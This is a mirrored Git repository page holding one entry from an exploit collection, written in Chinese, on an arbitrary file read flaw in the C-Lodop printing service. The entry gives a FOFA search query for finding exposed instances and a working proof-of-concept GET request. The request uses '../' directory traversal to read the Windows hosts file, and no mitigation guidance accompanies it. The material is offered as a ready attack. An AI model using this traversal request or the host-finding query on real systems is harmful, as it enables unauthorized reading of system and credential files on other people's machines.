admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-07 03:44:10 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/网络设备漏洞/C-Lodop打印机任意文件读取漏洞.md
Threekiii 9acf184afd 更新漏洞
2022-12-06 17:17:54 +08:00

334 B
Raw Blame History

C-Lodop打印机任意文件读取漏洞

漏洞描述

C-Lodop打印机存在任意文件读取漏洞通过构造特殊URL可实现读取系统任意文件。

FOFA

title="C-Lodop"

漏洞复现

poc

GET /../../../../../../../../windows/System32/drivers/etc/HOSTS HTTP/1.1
Host: 127.0.0.1
....